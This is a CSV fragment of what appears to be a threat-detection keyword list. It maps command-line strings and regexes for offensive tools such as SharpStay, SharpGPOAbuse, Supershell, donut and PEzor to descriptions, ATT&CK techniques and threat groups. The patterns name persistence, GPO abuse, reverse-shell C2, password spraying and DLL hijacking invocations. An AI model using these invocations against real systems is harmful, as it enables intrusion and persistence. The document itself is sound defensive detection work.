APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","162"
"* -64 -format=bof *",".{0,1000}\s\-64\s\-format\=bof\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","163"
"* -64 -format=dll *",".{0,1000}\s\-64\s\-format\=dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","164"
"* -64 -format=service-dll *",".{0,1000}\s\-64\s\-format\=service\-dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","165"
"* 9_DPAPI.py*",".{0,1000}\s9_DPAPI\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","166"
"* -a 1 -f *.dll -p http*",".{0,1000}\s\-a\s1\s\-f\s.{0,1000}\.dll\s\-p\shttp.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","167"
"* -a bruteforce *",".{0,1000}\s\-a\sbruteforce\s.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","168"
"* -a nightmare*",".{0,1000}\s\-a\snightmare.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","169"
"* a -r -cfg -sfx -z""SFXAutoInstaller.conf"" Standalone.exe*",".{0,1000}\sa\s\-r\s\-cfg\s\-sfx\s\-z\""SFXAutoInstaller\.conf\""\sStandalone\.exe.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#linux","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","170"
"* -a spoolsample*",".{0,1000}\s\-a\sspoolsample.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","171"
"* -a -t titleFixed='Supershell - Inject' -t disableLeaveAlert=true -t disableReconnect=true ssh -J rssh:*",".{0,1000}\s\-a\s\-t\stitleFixed\=\'Supershell\s\-\sInject\'\s\-t\sdisableLeaveAlert\=true\s\-t\sdisableReconnect\=true\sssh\s\-J\srssh\:.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","172"
"* -a -t titleFixed='Supershell - Shell' -t disableLeaveAlert=true ssh -J rssh:*",".{0,1000}\s\-a\s\-t\stitleFixed\=\'Supershell\s\-\sShell\'\s\-t\sdisableLeaveAlert\=true\sssh\s\-J\srssh\:.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","173"
"* aad3b435b51404eeaad3b435b51404ee*",".{0,1000}\saad3b435b51404eeaad3b435b51404ee.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","176"
"* acarsd-info.nse*",".{0,1000}\sacarsd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","177"
"* ACEshark.py*",".{0,1000}\sACEshark\.py.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","0","N/A","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","179"
"* acltoolkit*",".{0,1000}\sacltoolkit.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","180"
"* --action exports --dll C:\Windows\System32\amsi.dll*",".{0,1000}\s\-\-action\sexports\s\-\-dll\sC\:\\Windows\\System32\\amsi\.dll.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","181"
"* --Action NewSecurityFiltering --GPOName *",".{0,1000}\s\-\-Action\sNewSecurityFiltering\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","182"
"* --Action NewSecurityFiltering --GPOName *",".{0,1000}\s\-\-Action\sNewSecurityFiltering\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","183"
"* --Action RemoveSecurityFiltering --GPOName *",".{0,1000}\s\-\-Action\sRemoveSecurityFiltering\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","184"
"* --Action RemoveSecurityFiltering --GPOName *",".{0,1000}\s\-\-Action\sRemoveSecurityFiltering\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","185"
"* --action SPRAY_USERS *",".{0,1000}\s\-\-action\sSPRAY_USERS\s.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","N/A","10","4","312","62","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z","186"
"* action=BackdoorLNK *",".{0,1000}\saction\=BackdoorLNK\s.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","187"
"* action=CreateService servicename=* command=*",".{0,1000}\saction\=CreateService\sservicename\=.{0,1000}\scommand\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","188"
"* action=ElevatedRegistryKey keyname=Debug keypath*",".{0,1000}\saction\=ElevatedRegistryKey\skeyname\=Debug\skeypath.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","189"
"* action=ElevatedUserInitKey command=*",".{0,1000}\saction\=ElevatedUserInitKey\scommand\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","190"
"* action=JunctionFolder dllpath=*.dll guid=*",".{0,1000}\saction\=JunctionFolder\sdllpath\=.{0,1000}\.dll\sguid\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","191"
"* action=NewLNK filepath=*"" lnkname=*",".{0,1000}\saction\=NewLNK\sfilepath\=.{0,1000}\""\slnkname\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","192"
"* action=ScheduledTask taskname=* command=*runasuser*",".{0,1000}\saction\=ScheduledTask\staskname\=.{0,1000}\scommand\=.{0,1000}runasuser.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","193"
"* action=ScheduledTaskAction taskname=* command=*",".{0,1000}\saction\=ScheduledTaskAction\staskname\=.{0,1000}\scommand\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","194"
"* action=SchTaskCOMHijack clsid=*",".{0,1000}\saction\=SchTaskCOMHijack\sclsid\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","195"
"* action=UserRegistryKey keyname=Debug keypath=HKCU:*",".{0,1000}\saction\=UserRegistryKey\skeyname\=Debug\skeypath\=HKCU\:.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","#registry","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","196"
"* action=WMIEventSub command=* eventname=*",".{0,1000}\saction\=WMIEventSub\scommand\=.{0,1000}\seventname\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","197"
"* ADAPE.ps1*",".{0,1000}\sADAPE\.ps1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","198"
"* adaptiveC2.py*",".{0,1000}\sadaptiveC2\.py.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","199"
"* ADAudit.ps1*",".{0,1000}\sADAudit\.ps1.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","200"
"* ADcheck.py*",".{0,1000}\sADcheck\.py.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","202"
"* ADCollector.exe*",".{0,1000}\sADCollector\.exe.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","203"
"* --adcs --filter * --ntaccount * --enroll *",".{0,1000}\s\-\-adcs\s\-\-filter\s.{0,1000}\s\-\-ntaccount\s.{0,1000}\s\-\-enroll\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","204"
"* --adcs --old-bloodhound *",".{0,1000}\s\-\-adcs\s\-\-old\-bloodhound\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","205"
"* ADCS.ps1*",".{0,1000}\sADCS\.ps1.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","206"
"* adcsync.py*",".{0,1000}\sadcsync\.py.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","N/A","9","3","205","22","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z","207"
"* add * demon.x64.exe*",".{0,1000}\sadd\s.{0,1000}\sdemon\.x64\.exe.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","#content","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","208"
"* add /target:* /altsecid:X509:*",".{0,1000}\sadd\s\/target\:.{0,1000}\s\/altsecid\:X509\:.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","209"
"* add nc without being detected by antivirus*",".{0,1000}\sadd\snc\swithout\sbeing\sdetected\sby\santivirus.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","210"
"* addcomputer_LDAP_spn.py*",".{0,1000}\saddcomputer_LDAP_spn\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","211"
"* addcomputer_with_spns.py *",".{0,1000}\saddcomputer_with_spns\.py\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","212"
"* --AddComputerTask --TaskName * --Author * --Command * --Arguments * --GPOName *",".{0,1000}\s\-\-AddComputerTask\s\-\-TaskName\s.{0,1000}\s\-\-Author\s.{0,1000}\s\-\-Command\s.{0,1000}\s\-\-Arguments\s.{0,1000}\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004  ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","N/A","10","1162","143","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z","213"
"* Add-KeeThiefLurker.ps1*",".{0,1000}\sAdd\-KeeThiefLurker\.ps1.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","214"
"* --AddLocalAdmin --UserAccount * --GPOName *",".{0,1000}\s\-\-AddLocalAdmin\s\-\-UserAccount\s.{0,1000}\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004  ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","N/A","10","1162","143","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z","215"
